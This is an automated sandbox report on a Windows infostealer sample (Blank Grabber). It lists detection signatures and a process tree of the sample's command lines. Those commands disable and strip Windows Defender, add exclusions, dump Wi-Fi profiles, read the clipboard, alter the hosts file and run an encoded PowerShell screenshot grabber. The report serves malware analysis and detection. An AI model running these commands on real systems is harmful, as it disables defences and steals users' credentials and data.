Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
phost.exe

Overview

General Information

Sample name:phost.exe
Analysis ID:1574326
MD5:8c43bf4445cac5fa025b9dfd07517b6f
SHA1:b7e9e405e3867213cd3e544574ceff70bef2b6fb
SHA256:dcf517b48094726367f1fdb2ace3f2cfd29f4f9710512f45ecb0109d03cc0dcc
Tags:exegithub-com--hombozuser-JAMESWT_MHT
Infos:

Detection

Blank Grabber
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Blank Grabber
Yara detected Telegram RAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Check if machine is in data center or colocation facility
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Found pyInstaller with non standard icon
Loading BitLocker PowerShell Module
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Modifies the hosts file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Removes signatures from Windows Defender
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rar Usage with Password and Compression Level
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Writes or reads registry keys via WMI
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer

Classification

  • System is w10x64
  • phost.exe (PID: 3220 cmdline: "C:\Users\user\Desktop\phost.exe" MD5: 8C43BF4445CAC5FA025B9DFD07517B6F)
    • phost.exe (PID: 3444 cmdline: "C:\Users\user\Desktop\phost.exe" MD5: 8C43BF4445CAC5FA025B9DFD07517B6F)
      • cmd.exe (PID: 1136 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\phost.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 3140 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\phost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 5544 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 2912 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
        • MpCmdRun.exe (PID: 7764 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)
      • cmd.exe (PID: 2200 cmdline: C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permission and try again.', 0, 'Access Denied', 48+16);close()"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • mshta.exe (PID: 3848 cmdline: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permission and try again.', 0, 'Access Denied', 48+16);close()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
      • cmd.exe (PID: 2872 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7180 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7208 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7324 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7528 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 7580 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 7628 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 7712 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 7736 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7808 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7936 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7988 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8020 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? ? .scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8068 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? ? .scr' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7208 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7628 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7192 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7540 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 2000 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7664 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7544 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 5780 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 4248 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7816 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7188 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7936 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7748 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 4180 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 2084 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 7600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • systeminfo.exe (PID: 7948 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
      • cmd.exe (PID: 8120 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 4076 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 8108 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 3492 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 3748 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7400 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)
          • csc.exe (PID: 7120 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jnxiphgt\jnxiphgt.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • cvtres.exe (PID: 7752 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBE0B.tmp" "c:\Users\user\AppData\Local\Temp\jnxiphgt\CSC11F91C33F0BB4EC3B771882E34D952E.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • cmd.exe (PID: 8064 cmdline: C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
